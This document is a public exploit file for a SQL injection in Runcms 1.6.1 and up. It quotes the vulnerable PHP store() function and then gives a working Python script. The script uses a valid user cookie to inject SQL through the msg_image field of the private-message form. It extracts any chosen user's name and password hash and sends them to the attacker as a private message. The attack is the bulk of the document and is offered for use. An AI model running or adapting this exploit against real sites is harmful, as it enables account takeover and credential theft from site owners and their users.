runcms161-sql.txt

`#!/usr/bin/python  
"""  
#=================================================================================================#  
# ____ __________ __ ____ __ #  
# /_ | ____ |__\_____ \ _____/ |_ /_ |/ |_ #  
# | |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\ #  
# | | | \ | |/ \ \___| | /_____/ | || | #  
# |___|___| /\__| /______ /\___ >__| |___||__| #  
# \/\______| \/ \/ #  
#=================================================================================================#  
# This is a public Exploit #  
#=================================================================================================#  
# Runcms <= 1.6.1 #  
# Sql Injection Vulnerability #  
# Benchmark Method #  
#=================================================================================================#  
# .-= In memory of our friend rGod =-. #  
#====================================#===========#====================================#===========#  
# Server Configuration Requirements # # Some Information # #  
#====================================# #====================================# #  
# # #  
# magic_quotes_gpc = 0 # Vendor: runcms.org #  
# # Author: The:Paradox #  
#================================================# Severity: Moderately Critical #  
# # #  
# Uff... I have to find something to put here... # Proud To Be Italian. #  
# # #  
#====================================#===========#================================================#  
# Proof Of Concept / Bug Explanation # #  
#====================================# #  
# #  
# This time i'm really too lazy to write a long PoC. #  
# $msg_image (but also $msg_attachment) is unproperly checked when calling store() #  
# function (modules/messages/class/pm.class.php) #  
# Sql injection in insert syntax (whatever I am not using blind attack). Prefix knowledge needed. #  
# #  
#=================================================================================================#  
  
[modules/messages/class/pm.class.php]  
  
  
64. function store() {  
65. global $db, $upload;  
66.  
67. if ( !$this->isCleaned() ) {  
68. if ( !$this->cleanVars() ) {  
69. return false;  
70. }  
71. }  
72.   
73. foreach ( $this->cleanVars as $k=>$v ) {  
74. $$k = $v;  
75. }  
76.   
77. if ( empty($msg_id) ) {  
78.   
79. $msg_id = $db->genId($db->prefix('private_msgs').'_msg_id_seq');  
80.   
81. $sql = "  
82. INSERT INTO ".$db->prefix("private_msgs")." SET  
83. msg_id=".intval($msg_id).",  
84. msg_image='$msg_image',  
85. msg_attachment='$msg_attachment',  
86. subject='$subject',  
87. from_userid=".intval($from_userid).",  
88. to_userid=".intval($to_userid).",  
89. msg_time=".time().",  
90. msg_text='$msg_text',  
91. read_msg=0,  
92. type='".$type."',  
93. allow_html=".intval($allow_html).",  
94. allow_smileys=".intval($allow_smileys).",  
95. allow_bbcode=".intval($allow_bbcode).",  
96. msg_replay=".intval($msg_replay)."";  
97. }  
98.  
99. if ( !$result = $db->query($sql) ) {  
100. $this->errors[] = _NOTUPDATED;  
101. return false;  
102. }  
103.  
104. return true;  
105. }  
  
#=================================================================================================#  
# There are other vulnerabilities in this CMS. Find them by yourself. #  
#=================================================================================================#  
# Use this at your own risk. You are responsible for your own deeds. #  
#=================================================================================================#  
# Python Exploit Starts #  
#=================================================================================================#  
"""  
  
import urllib, urllib2  
from sys import argv, exit  
  
  
main = """  
#================================================================#  
# Runcms <= 1.6.1 #  
# Sql Injection Vulnerability #  
# Discovered By The:Paradox #  
# #  
# rGod is still alive in our hearts #  
# #  
# Usage: #  
# ./homerun [Target+path] [TargetUid] [ValidUserCookie] #  
# ./homerun --help (to print an example) #  
#================================================================#  
"""  
  
prefix = "runcms_"  
  
if len(argv)>=2 and argv[1] == "--help":   
print "\nuser@linux:~/Desktop$ ./homerun http://localhost/web/runcms/ 1 rc_sess=a%3A3%3A%7Bi%3A0%3Bi%3A3%3Bi%3A1%3Bs%3A40%3A%228b394462d67198707aea362098001610d35687ff%22%3Bi%3A2%3Bi%3A1212933002%3B%7D;\n\n" + main + "\n\n[.] Exploit Starting.\n[+] Sending HTTP Request...\n[+] A message with username and password of user with id 1 has been sent to user with id 3.\n -= The:Paradox =-"  
else: print main  
  
  
if len(argv)<=3: exit()  
else: print "[.] Exploit Starting."  
  
  
host = argv[1]  
tuid = argv[2]  
cookie = argv[3]  
try: uid = cookie.split("a%3A3%3A%7Bi%3A0%3Bi%3A")[1].split("%3Bi%3A1%3Bs%3A40%3A%")[0]  
except: exit("[-] Invalid cookie")  
sql = "icon12.gif', msg_attachment='', subject='Master, all was done.', from_userid=" + str(uid) + ", to_userid=" + str(uid) + ", msg_time=0, msg_text=concat('Master, password hash for ',(select uname from " + prefix + "users where uid=" + tuid + "),' is ',(select pass from " + prefix + "users where uid=" + tuid + ")), read_msg=0, type='1', allow_html=0, allow_smileys=1, allow_bbcode=1, msg_replay=0/*"  
  
  
print "[+] Sending HTTP Request..."  
values = {'subject' : 'Master attack failed.',  
'message' : 'Probably mq = 1 or system patched.',  
'allow_html' : 0,  
'allow_smileys' : 1,  
'allow_bbcode' : 0,  
'msg_replay' : 1,  
'submit' : '1',  
'msg_image' : sql,  
'to_userid' : uid }  
headers = {'Cookie' : cookie,   
'Content-Type' : 'application/x-www-form-urlencoded'}  
req = urllib2.Request(host + "/modules/messages/pmlite.php", urllib.urlencode(values), headers)  
response = urllib2.urlopen(req)  
  
  
if response.read().find('Your message has been posted.') != -1: print "[+] A message with username and password of user with id " + tuid + " has been sent to user with id " + uid + ".\n -= The:Paradox =-"  
else: print "[-] Unable to send message"  
`